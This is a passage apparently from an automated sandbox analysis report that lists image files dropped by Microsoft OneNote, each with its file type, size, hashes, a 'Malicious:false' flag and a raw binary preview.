                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!...1A.Qaq.........."2Rr.#.t6..B..3S$4..v.b..Cs.%5..8..cUV.(.DEe.&Ff...T.d.......................!.1A..Qaq...s4....2r..S"BR.3....b#C$.....c............?..D.."}:......&&...?3..W.q*.......]...m.Y.k1......K).J...uV.b.../.0.E.H..4..W_T.[t.V.w.9.x.qe.L..o.oL.....d.\.....6.|.o...}..H{Yn..E...6Y3.l.e..D.:,.n.%...t...m.........,+,..|..n.....6.*...f........6.../$../Vi..H...e.f.F.zn.).n.E..2sTn.i...Yb?6+H&...Bf..*....z.o.^7[..u.:o....t.s=.....(.s.....f.g....q9o.u1L.N...smzE..[>...+\O....j.<....j.c.W.............U..+.F/.'..W...T./W...>i01./....j.s."..Q...{...a._~OW...Rp.)*.e..W..Q4)<..'..W...q...'..U..z..g......U}...O....w....0F:.N..V.3W.|..'z0.]...j..U[v..g$D.Lc[.e...UW.m0+
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 50 x 500, 8-bit colormap, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2033
                                                                                                        Entropy (8bit):6.8741208714657
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:P37XYSDTz+UUl7DHt7Ah8l1+4ZfFclFUXwobKXlZr:v7j3z+UoDN0h8ugf2AwobMN
                                                                                                        MD5:CA7D2BECCBC3741D73453DCF21D846E0
                                                                                                        SHA1:E34B7788498E33FFF0CFB00125E6BA9E090F6CED
                                                                                                        SHA-256:E9EAD0BFC09D32CB366010CDFEDE1C432A2D1D550CB7332BADAC1BEE9482BC86
                                                                                                        SHA-512:7FE2C3654262B1EEBED4F6D83DA7D3450E1BE52500A3964185FC0092041506A237A2728E5D7EEA0A3814E413E822B803B789C49CF744D51816A2E4EDE5B4247B
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...2.........H'......PLTE........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................[....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.\.W.G...=a.ewA..a.!r( ...%Dc..x.x....N.OO...3=...S...........~.z.D.0...g.2P.7.*M.#'....z.......3TPj.Z.[5....V..z'L3...a.j9..C>..9.z
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):55804
                                                                                                        Entropy (8bit):7.433623355028275
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:gVvci05lhVbfBcWvBLeynluexaWqzww/u5:gVUZhHDljaHww/u5
                                                                                                        MD5:4126992F65FE53D3E3E78F6B27FD49DC
                                                                                                        SHA1:BC0D76B69310DA9B909D3EE4CECBFE5F386BFB45
                                                                                                        SHA-256:3FBE3C1C238BD7DBC67F8CFF5F3BDDFD513C96A9851B9616477947D21DFF4B2E
                                                                                                        SHA-512:624853F5E56D224C8188F122B2C4724F867D4099E7FAAFB9C945BE7E2907900ADCF4AE97AB08909CF94E96FB6F381E3B6396D560D93EB2731E4E69CBFE628F10
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d..............................................................................................!1...AQ.aq"2.....BR..8x..r#..9b....3....CS$.'.cs.......7Gw.(.4%5&..Wg.h......tEVfv..H..........................!1A..Qa.q...."2..u6....BRr.#...b..3s..d...7.Cc.$Tt..S4.5Ue..&..%.................?...,...8..{..S.y.N....%..q.8..H[5....o..xg........)c(.eO.YO..._D..x.U.....%.S.r.r._.^..Su.h.Q.t.:.#?....x..B.S...Q.....oqF..%..8'.qx....%.2JKjF..{y.w0.*a.RMb.c.Q{%....eW'..[IV..'ZW3...[...MN.....rO.:....$.i..7....Vrrr...I.r..M..Qo..j....q.^...N...J......%.J..)F...>$.....u........o...+......[...*..t....R}.I..R..S..GB..:......).6_[^Xft...F.1.....zP....,.#....MG.T..Q.F.....)Fi../.I...,%.voEb.b.Z..V3..FT.}..[Z{....wd.z.e.....QwW(.).t..\..'....:)<W.<..&k...caRT.X(..K.....:f...]...q..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):59832
                                                                                                        Entropy (8bit):7.308211468398169
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:HS9SYFtN0+CRa9mfJy4zBAiIJhzrkHDV2hJK:yAmta+Tyy4zBIJW5WK
                                                                                                        MD5:DCDD543A4E0BA2C1909BA095D46FFBCB
                                                                                                        SHA1:B86C89537138FE07255354202D3EAD0B53B3C54D
                                                                                                        SHA-256:28F334B77068F71F5F92A95695433B950610204A0E5580CE567DB8FAD4993ECB
                                                                                                        SHA-512:5408C3259B7F3288A4BEB04342799AD5FE3A6F0EC7E92353B29B7E7E538DFA9903B39637226919E0421BC422635D25F5F8069DC7441864DC03E1B909BF5C2C84
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H.....fExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:08:07.............................S.......................................................&.(.................................0.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................y...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......;R~+'....xh..~.n-}.......Te................^B..IU_....._...S......h.......!....9...A}6V=J......C..c.....Ug.Wh......
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                        Category:dropped
                                                                                                        Size (bytes):33032
                                                                                                        Entropy (8bit):2.941351060644542
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:ofmqvnCfmqsp1Ue5xzMq+Qh0dffUmS0w5xzMq+Qh0di:AGAp1rmSl
                                                                                                        MD5:ACF4A9F470281F475EA45E113E9FB009
                                                                                                        SHA1:B20698DDA5E5AFDD86BB359A6578C9860D5DF71F
                                                                                                        SHA-256:5DC2367A80588A7518DB5014122510BF0FD784711015EF83A8718336584F82D0
                                                                                                        SHA-512:998B7DB9DB08FD15A293267E2371052E436E024AF8D34F96D3C8FF04B1316678DFC1674C921CB404121FF381A4FC39DC759E6698F19D42A6261CBD39469B0A08
                                                                                                        Malicious:false
                                                                                                        Preview:....l...........................Ac...... EMF........$...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC........................F...(.......GDIC............^...........F...........EMF+*@..$..........?...........?.........@..X...L........................."B...B...B...................?...........??.....n............;...<..@<...<...<...<...<...=...=.. =..0=..@=..P=..`=..p=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...>...>...>...>...>...>...>...>.. >..$>..(>..,>..0>..4>..8>..<>..@>..D>..H>..L>..P>..T>..X>..\>..`>..d>..h>..l>..p>..t>..x>..|>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...?...?...?...?...?...?
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 3005 x 184, 8-bit/color RGBA, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):12180
                                                                                                        Entropy (8bit):5.318266117301791
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:k1bHyG/fKOOOOQJUg+g2S+kEm6alfsfsfn32:+bSG/yOOOOQ+g+gOab32
                                                                                                        MD5:5C859FF69B3A271A9AAB08DFA21E8894
                                                                                                        SHA1:3156302A7450ADFF4D1B6EC893E955D3764D4DD4
                                                                                                        SHA-256:B4A8E9A67EE0B897615AC4CCE388FFC175AB92D9E192E6875C79A4E7C1B5BB6E
                                                                                                        SHA-512:4CF518136EEBCA4F400A115D9B7BB0CAC9FA650BF910B99E15F04A259B7D3EFCFFD6796886FE09DB08C37C332B14BC8500845C09C8EAE1F2306F90E98D3C99E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR..............;j.....sRGB.........pHYs..........+..../9IDATx^...dW...S=.dL$.............-.`...'...x.7.D...(...$.?cO....9S]=.v...Z.......{..wNuf.&.....a.k5~...._..\.yk..v.....}{._.Q...5...._9o.n.....}7.].1v..t......q....3.<..0<.p.......0....s...... @....... @....... @....... @....... @...X.'..U-..... @....... @....... @....... @....... @......,I......+..... @....... @....... @....... @....... @........z...r.. @....... @....... @....... @....... @....... .$.C.KJ[.... @....... @....... @....... @....... @........&`.=X`.%@....... @....... @....... @....... @....... @....../)m.. @....... @....... @....... @....... @....... @ ....`.)....... @....... @....... @....... @....... @....K.0.....J....... @....... @....... @....... @....... @...`.....\.... @....... @....... @....... @....... @......,I......+..... @....... @....... @....... @....... @........z...r.. @....... @....... @....... @....... @....... .$.C.KJ[.... @....... @....... @....... @....... @........&`.=X`.%
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 39 x 600, 8-bit colormap, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2104
                                                                                                        Entropy (8bit):7.252780160030615
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:2PPEOtz2P/LJtVRaqBG8qFOPvHlcEXgkuwf+j:2PZFSjJDjqFOPPlXgG+j
                                                                                                        MD5:F6C596F505504044DF1E36BA5DA3F09B
                                                                                                        SHA1:BCF17EC408899B822492B47E307DE638CC792447
                                                                                                        SHA-256:EDBB86F160050FBF1F9860276802BAE292DBFD0BC98E3EA90D43D981E9F0C54A
                                                                                                        SHA-512:E8D067A1932CED8746FE7D665EEC34EA92A98AFF3DF26FFA9DD02742DDEA3C5654124A88A649FA33DB596F96A5FC9CB2C693D03132F1C8B254ACB56DB4763BD8
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...'...X.......:....PLTE.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................{.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^..c.%i.F...m.m.f.m.m.m{&....X...9.....M.WUW.d.N.O...E$...$...)H....n....N.k..v.....v1L[w)w.}..!...Y.X.V.D.......[....;..[..;....
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):14177
                                                                                                        Entropy (8bit):5.705782002886174
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:EbgGcV/hlvpfal7rgYa8S7auAxwfuSTmCSNoFQ6NO7L:EbgGcVnpwimnd38FdQL
                                                                                                        MD5:7CDCE7EEBF795998DA6CAC11D363291C
                                                                                                        SHA1:183B4CC25B50A80D3EC7CCE4BF445BCFBAA6F224
                                                                                                        SHA-256:DE35AF949D4F83E97EE22F817AFE2531CC4B59FF9EE6026DCA7ECEBC5CF2737F
                                                                                                        SHA-512:560FB15A9C12758D11BB40B742A6EAD755F15AD10D6C5DEBA67F7BC8A2AE67C860831914CBCBCDED9E6B2D1D5F26A636B9BCEF178151F70B4D027316F94F27E1
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!.1..A....Qa".q..2.....&...B%6.'..R#3.$E.r457bS.DUFV.Wg(.......................1...3.Q..2Rr....s.4.!Aq.S.aC5B$%............?...n.Liq.}.{#....3/gg.1.M +..~3...q..+=..:.g.i1;P)7.....q..n.s"p...wx........v.t.f;..L/..~....y.r[.r.....n.n3..6i..g..}../........3..x.L.i?We..l.......~..<.;..6..o.....N.t.o6.l..~.......<...m.V...Q.7k.u./wq.t..;.I...}..{...>.L..3m..a....yd......6~.f..~Y..}+..<.[w..'-..?.v.7...v.u..4.......1];..u.MO.......s..p..ms.'.O-o...O......m.k.e....)t....i>..E|....,iOyD|.{......g.n...cu....=..........h.\.Q:?g/?.I.3._...t...d.n.0.%y....S.Q....S.&K.w..&wY<....%.g.v.....$y..#,i;.=...t...I6..yO..o.d..w\k...~......)..rK.......].u....N....e.s..kU.u..'}
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:44:07], progressive, precision 8, 611x163, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):36740
                                                                                                        Entropy (8bit):7.48266872907324
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:3nwDxjTvoE0Rjwit4rjucDILWg7/Da0JgGQ8e1S8SA/Khos0:SxjTmZw7nucDILj77a0JgGQvScb
                                                                                                        MD5:9C205C8D770516C5AA70D31B2CA00AF3
                                                                                                        SHA1:9A1002F0CF7F92F1BE2BB25BAD61CEBFAC282482
                                                                                                        SHA-256:E111F96490755C7D71E87C88ACAEA38AFE55BB865B1A14A83C5BD239648D5E2C
                                                                                                        SHA-512:A3E105208B32831265428572B0937DD3C17B793D8611B2DA8D4939F1BEC6050999D375E3F6B87D53AD49DFA0EAE737B0141D37597AA42116C310761973D4A134
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:44:07............................c.........................................................(.....................&...........n.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d................................................................................................................................................."...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..o...4.gP.~.c...K{...V.=...].<.........vS.........s....(.t......X......kk7....~-...yF}^c.Z.\.G./.?t...>....:.>......./.ib..).
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):53259
                                                                                                        Entropy (8bit):7.651662052139301
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:dCiCBBenRYWDBCipMYGTbYGLHbXxoP/qEF+MU50qyJ30h2W474S/Aq/xc4674bi5:dCiIQXBCiwbDLHD0/sFyVel4Pi4UgE
                                                                                                        MD5:2EE369ABB7936F8C28FF0ABDD224EA05
                                                                                                        SHA1:FE9D304A7B49E31EAE439369ABC548E265149636
                                                                                                        SHA-256:FB12D59B8BE911247BBAFDD416852E8B74B028005A141CB4DBBBA109B4B6ED2C
                                                                                                        SHA-512:5CF396CA472C32AE988600176114106CB1619404DD899A3867A5AB43DC90583B771EF69B14EF50E56A21F038BF51D8463C6ADD2DE9D4CB523F6290E24A4DECB3
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..AQa....q........"2..R..Bbr..#S....3$.....C.4v..(X.DtEUV.....cs..Td.5uf'Wgw8Hh........................!1Q.Aa....q.2...."R...r..3.t..U...B#S.4ub..C$d.5Ee&'7c.D%sT..............?.....?...k,lk^...M".Yo5.Qp.&s}b.m.:...W.x}.*.a......N1..d-n.-..^..b..TZ.W..."....F....^......ve5...^...2.:i...........~u2pK.z./&..u..L[I....Y....@y{|>..MN=:....Q[..H....a........|%..4fV....).....^.9b.f...F...p.=.W...aZ.........Z.t.n.....z3..[..lVh..\.N-.._.sK.y.._e.G.jig.a.7^....u...*.p.5.a.].........u/u..D.yl.XA..f.z..~.x.....N.....b=.uv.2.t.'.N.-.H..n.v.a.A[.Z.....T2...._...:....h..l.E..sm..a.3I...RE...fWb.Ek.0.#.)..Y#T...........u{....U....s.].7_H.2.`O6...P......}..4LR....]4.mid...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60924
                                                                                                        Entropy (8bit):7.758472758205366
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:kU7O7+CFqO6DkxTgPzo2wqggrrX8QvN1I/ZLBttB9+dPFXbc:hVuqJDaTqo2wq1L84N1I/Z1tT9X
                                                                                                        MD5:D58C51D2CF586A5E14A9EC8529C3B0A8
                                                                                                        SHA1:F4811A353797C29B1E3F5A61B125C46E1534D587
                                                                                                        SHA-256:F927C7825851974A2149868146970706523A49165133CEE6027A43E8C9ABDF27
                                                                                                        SHA-512:34B963173AFBDF07432F4B983D29F10376E4771FE666E9D50B1A81DA0B9F6001FD86B4A08B9711386DE153BF6E03C8E932E2D181C8EAF94EFF34D20FCA7570E0
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d................................................................................................!1AQ.aq....".....2B...Rbr#.s.4...3$.5u.6v..CSc...DT..f..t..&F........................!1..A.Qaq....."2....B.s....Rbr..#4...35...CSc.$...DTdt..%..............?....O<......X.O.Fg..{.W&u.u.T~.|r;g!.._X..N.p.4.........................................................yK..xd...6..|%....\j..e.=...Y..f..I.|-....e...$R.j.......~.W#....{.....V.k.|F..z^..:.~..f......"x.....L..K..r../.;..[..l...;.U...W...X.........8.....y?..B...m.......j..Q.g3..G.K....GL.o..n7a..Y..[.'.........x........\......~...f...0\Wc.n?k.|.....1.ww;..2..?...r4uF.MXdB6..W..mG2NJ.E........u...2.q...Z..=(l)jU.X...U.\X.......O<......X.O.Fg..{.W&u.u.T~.|r;g!.._X..N.p.4.......................................................
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 39 x 579, 8-bit colormap, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):515
                                                                                                        Entropy (8bit):6.740133870626016
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:6v/7su2/c30mqkg9VgFHe7Ll8UmJX/N+1Zmkk8f3lbtI4:4mc38gFHe18lkk8f3lbth
                                                                                                        MD5:E96BE30D892A5412CF262FEE652921CA
                                                                                                        SHA1:8190A0BFE21D04BC6F3A406E91B87CA69C03A2DE
                                                                                                        SHA-256:0E31DA4DFCFF4A36C64C1CE940362D2309769F36369E4C43C317D5F2FA15658E
                                                                                                        SHA-512:D647F51ABBD013226A6ADD0D551D058C633F867F9AF5A9E099B85D6E291D220F7B85958B07381CD4C7C4F72356DBAFE2A86932AE398E28C56CDDF0744E92EE24
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...'...C........b...`PLTE..................................................................................................bKGD....H....cmPPJCmp0712....H.s....9IDATx^..I..@.C..<..?mo.#C((.J}...~..B...b.I.i.\<.e.....(p.I.EO...q.x.......dRz....K..b0.:.<c.o..0.x\:...F....I&..ap....."P@....DO...q)p*..@Y.CL2)=......1.........4....._.G..^`..lDO...q...X....SL..z....K..#.L#..I6..ap.Ls.,....7&..ap.p..lI...,GO...q.....k.n1..4......3=.f.x.$..4.....o....x.$+..0.x\.,&6...............IEND.B`.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 30 x 700, 8-bit colormap, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1547
                                                                                                        Entropy (8bit):6.4194805172468286
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:dZeDNYbS+238CTUFPA6SXG5qSacX9q73eXu0vC3dU+OB2gbwHRuZ:dykp9FzBBacXQ3uNC3n7xuZ
                                                                                                        MD5:0BA36A74DFBF411FAB348404CCEC3348
                                                                                                        SHA1:4C619790E517416E178161028987DF1CD3B871CC
                                                                                                        SHA-256:2E7AAF26BEC32148B96442E8FFF1BD2CEF2D72630969F23B9A2ABEDB6CFEC93B
                                                                                                        SHA-512:90AF53DB7C413E2ADB970AC345F73E4ED8AF626E179C929E6560118F7A9E98DC7C5FF02B2B3F6C98D397E0FE2D85F3427C6928C328872149E176FA8A99E91F54
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...............\....PLTE.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................D......bKGD....H....cmPPJCmp0712....H.s.....IDATx^.WSTA........b.0gPPP0..E.9b@L(.c.N.U>..@......;...}..B.(....$......5..XS...I....).!....D^.uE...\..5........F."o..-...m.n. .^.....q= .
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):95763
                                                                                                        Entropy (8bit):7.931689087616878
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:EoES7mhTyzabUaE77xAOmq0zVruQlttNxlipxVWssMU2YhRy2v6pKKYhQzwMc2:zz7mhTyzabUa4b4xuQlttnlGx8x9h02M
                                                                                                        MD5:177DD42CA99CAA2CCBF2974221680334
                                                                                                        SHA1:35FD86B3DD082A6D4930C67BC0E05D3B5817465A
                                                                                                        SHA-256:525A857D0EDA855A64D3619DF58B1C2D013A73E60FA0D49B155ECFCB2C134C7C
                                                                                                        SHA-512:6FB6D9A6C97B1115C3246690A2F339CD612899AC25ACBA00296EAEAA0A1D094E7339D670969764FE23EB7C08FCDD01C6F78FBC0735D504D5E02AD342901719B3
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!..1AQa...q......."...2..B#Rb3..r$...6..C4....Ss%5...tu.c..Dd.EU7....................!.1.AQ..aq......"r..2...4Rb#3$B.Ss............?..H..dV....U..-..0]Cp.%O.Z.Y.e.=/.q.....j76.w@s...5.&&&5...n..w..>.1....;.vR..[.......=.......KtY]u3.g18...).r....&.IZ'.....g..4kY..X..b.......y<...r1........e.._...X...w....op.m%Jr31...S.Vo.._....OI\]....F..V-....\...2j..X.....y.p.$4.....&#..]..n.V..x..P...F..C.f....])..~..Z\.....,..#..v..v...2V.k.SuaydO../[.*c._..oTV<Z.s.[...o.x..>....-....v...#....-.X..L.Z./#.XG.-.0......%w..H.@aZ....C.}...N~.;..R......5.D......I.... .R........s.>..ks....(...S...9....2=. :^.. p.+?(....$..Q..I.........=|..`2. v..t......U*.8.u.. ...'...*...2;u....& 3..$.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):67991
                                                                                                        Entropy (8bit):7.870481231782746
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:3PC0XJjsmsKuZRG1pXuZ6z3wARnV9AEnieCc7cllJcHJ:qyMBzkUZ0gq25c7Z
                                                                                                        MD5:1271B1905D18A40D79A5B9DB27EE97EA
                                                                                                        SHA1:9618608FBD7342DE6C71220A36C3F4995BA9C13E
                                                                                                        SHA-256:5B321A4D81BD499B289B1755F6450A42047C494DFBC112DBD56DA4CED2C15C1A
                                                                                                        SHA-512:C32DD26047F6B8AA061085B38AC2B8335868E1BFD8731DB65544309223A955FA4BF45B06AC8D244408658F51A1775B6F19FF0FFC804989DE706DE8EB36F1436F
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1..AQa..q..".........2...BR#b.r.3...$.'...)..C%7gw..(.S.W89.......................!1.A.Qa.q".....2...#....B.t......rc.$%67Rb3s&'CUu.v....S.d5.V4T.e.............?...?..Wj.e.e.......w/..E..eOw_.....6......u..C6h.,..;.g.D8Z..-)O..jy..e;.u.g..w..[.L""k'w.......'1'.[......=..P...S.9a.V./O....q=8xk]...........9......F...e9'....9.O.... .&.....p......c.4...mr...?.......L..'.....0....+..|_...POM=7.?.2.a....};.Z..y./....>./.C.<...;.....|.1>...........S.8.o.O...+..n2...k../.X..9...Y...:.....\...Dk......q.K..\.Wuh.!Z?.mu...R.5.A.S.h.0..[..v..+M.....aUi*.k..?#..._...X..R.&]..[..;../]L..f..V......*.e...ut&.#.J.5....c%..o.$..v.<K.6..T.IP.....6X.*.uf..t0^..-.)m$.!.q(.j.f;..WB6.b.B..R.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):22203
                                                                                                        Entropy (8bit):6.977175130747846
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:5q3R1VBvq3R1Flrk6Q0QPJJrR39joOVMJ25d1NkMhIwobbtAAAqYnLJZMJYZ2AC:xw6Q0WJR3FoOVMJIIlAAAqYnMJdD
                                                                                                        MD5:2D3128554F6286809B2C8E99DE5FD3F6
                                                                                                        SHA1:FC42CB04151D36F448093BDEFE33031A9B8D797D
                                                                                                        SHA-256:14FA2D16310485AA1CE41F6D774A3D637E8CF8B03C4F72990155DF274FDB6BD9
                                                                                                        SHA-512:D8531247A6E89ECABEA9C4A78F596CCE3493334EDF71AE4F7998FDDD0F80705948609C89756AB56FDFAB6D04DEC5F699A693801A772CA2EE2465BDD2CE5D2D5A
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H.....XExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:06:24............................&.........................................................(.....................&...........*.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...H.....Go.Kxn.b..g...........%?_....O......q......7G......%%.V..8zm.].v?...jJ~._..>.......O;........o..rI.A.....n.a.........
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):15740
                                                                                                        Entropy (8bit):6.0674556182683945
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:Elv3GG8/OOs+GouFdxMlxjoPyerzkpuOo2vPMc62PaJseZC+BJoS/:EtNiwdxMlZoPhzkpuOo2PMc6rX8+B6+
                                                                                                        MD5:FFA5EC40DC9A0FD10EB9E6355142D6A6
                                                                                                        SHA1:3D3D6A7E086B3C610C08F1F3E3F883604F06F2A4
                                                                                                        SHA-256:D74C3973C8D1F7C77274691AFB1AA934940674341D7EEE563BE75E563281BDFD
                                                                                                        SHA-512:6FAF2A24D06E6008F3579C7CEC90C2887462BDF83FAD7372FBB74B8DE90340B580E9836F309B68A9794597A598F7DCDA661C9A58DA6D8187C69083B7A17C9CD9
                                                                                                        Malicious:false
